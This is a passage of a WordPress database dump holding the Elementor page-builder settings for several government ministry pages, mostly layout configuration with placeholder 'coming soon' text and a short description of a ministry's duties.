page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17923,2639,'_elementor_edit_mode','builder'),(17924,2639,'_elementor_template_type','wp-post'),(17925,2639,'_elementor_version','2.7.5'),(17926,2639,'_wp_page_template','default'),(17927,2639,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lima\\\",\\\"tag_id\\\":\\\"58\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lima\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17929,2640,'_elementor_edit_mode','builder'),(17930,2640,'_elementor_template_type','wp-post'),(17931,2640,'_elementor_version','2.7.5'),(17932,2640,'_wp_page_template','default'),(17933,2640,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ba7389\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LiMA coming soon!<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5cce3400\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"18267993\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"37219f1f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ab5334\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lima\\\",\\\"tag_id\\\":\\\"58\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lima\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"55f0c58f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"126f7a36\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41e8be5a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1f1d95fa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lima\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17934,1606,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17935,2641,'_elementor_edit_mode','builder'),(17936,2641,'_elementor_template_type','wp-post'),(17937,2641,'_elementor_version','2.7.5'),(17938,2641,'_wp_page_template','default'),(17939,2641,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ddbf8c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Concession information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ae54ef2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"50d3d3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7172f56c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"29eecb5b\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"concessions\\\",\\\"tag_id\\\":\\\"51\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"concessions\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4bb76f44\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6e4d7076\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"19203562\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"58c6b4a8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:concessions\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17941,1604,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17949,2643,'_elementor_edit_mode','builder'),(17950,2643,'_elementor_template_type','wp-post'),(17951,2643,'_elementor_version','2.7.5'),(17952,2643,'_wp_page_template','default'),(17953,2643,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"52624ff6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"6d47854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3c330365\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"30a16cc2\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mot\\\",\\\"tag_id\\\":\\\"62\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mot\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3aa21\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"69e27fd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df2b844\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9e5ee94\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mot\\\" 